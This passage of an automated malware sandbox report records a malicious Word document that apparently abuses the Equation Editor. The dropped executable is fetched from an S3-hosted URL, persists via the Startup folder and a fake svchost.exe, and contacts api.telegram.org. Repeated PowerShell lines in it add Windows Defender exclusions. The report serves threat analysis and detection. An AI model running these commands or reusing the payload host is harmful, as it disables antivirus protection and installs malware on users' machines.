                                                  May 4, 2021 20:31:09.572257996 CEST192.168.2.228.8.8.80x2c09Standard query (0)miolouno.s3-us-west-2.amazonaws.comA (IP address)IN (0x0001)
                                                  May 4, 2021 20:33:21.528346062 CEST192.168.2.228.8.8.80xc6c2Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  May 4, 2021 20:31:09.571837902 CEST8.8.8.8192.168.2.220x2c09No error (0)miolouno.s3-us-west-2.amazonaws.coms3-us-west-2-r-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                  May 4, 2021 20:31:09.571837902 CEST8.8.8.8192.168.2.220x2c09No error (0)s3-us-west-2-r-w.amazonaws.com52.218.240.113A (IP address)IN (0x0001)
                                                  May 4, 2021 20:31:09.630546093 CEST8.8.8.8192.168.2.220x2c09No error (0)miolouno.s3-us-west-2.amazonaws.coms3-us-west-2-r-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                  May 4, 2021 20:31:09.630546093 CEST8.8.8.8192.168.2.220x2c09No error (0)s3-us-west-2-r-w.amazonaws.com52.218.240.113A (IP address)IN (0x0001)
                                                  May 4, 2021 20:33:21.577101946 CEST8.8.8.8192.168.2.220xc6c2No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • miolouno.s3-us-west-2.amazonaws.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.224916752.218.240.11380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  TimestampkBytes transferredDirectionData
                                                  May 4, 2021 20:31:09.848525047 CEST1OUTGET /mad.exe HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: miolouno.s3-us-west-2.amazonaws.com
                                                  Connection: Keep-Alive
                                                  May 4, 2021 20:31:10.101667881 CEST1INHTTP/1.1 200 OK
                                                  x-amz-id-2: DS7QrdmdJpyib1F1w8LPzDqd7RTzrfjUtXZKXhrpOuBqbV8xuHGgC7n/1gKtnvkdl880SC70WW0=
                                                  x-amz-request-id: S238G7R11599EGD7
                                                  Date: Tue, 04 May 2021 18:31:10 GMT
                                                  Last-Modified: Tue, 04 May 2021 10:51:11 GMT
                                                  ETag: "d96f52fc8733d2f4a127bdc44d4ceb25"
                                                  x-amz-version-id: IAoppdQmXchpR2n3EPNrNxP0ggf842rd
                                                  Accept-Ranges: bytes
                                                  Content-Type: application/x-msdownload
                                                  Content-Length: 3367424
                                                  Server: AmazonS3


                                                  Code Manipulations

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Start time:20:30:37
                                                  Start date:04/05/2021
                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                  Imagebase:0x13f520000
                                                  File size:1424032 bytes
                                                  MD5 hash:95C38D04597050285A18F66039EDB456
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:38
                                                  Start date:04/05/2021
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:43
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Imagebase:0x2e0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 41%, Virustotal, Browse
                                                  • Detection: 19%, Metadefender, Browse
                                                  • Detection: 45%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Start time:20:30:49
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:50
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:51
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:51
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:56
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
                                                  Imagebase:0x10b0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 41%, Virustotal, Browse
                                                  • Detection: 19%, Metadefender, Browse
                                                  • Detection: 45%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Start time:20:30:57
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:57
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:58
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:31:00
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
                                                  Imagebase:0x10b0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:08
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Imagebase:0x2e0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Start time:20:31:08
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:08
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:09
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:14
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Imagebase:0x2e0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Start time:20:31:13
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:13
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe'
                                                  Imagebase:0xb20000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 19%, Metadefender, Browse
                                                  • Detection: 45%, ReversingLabs

                                                  General

                                                  Start time:20:31:14
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:15
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:16
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:17
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >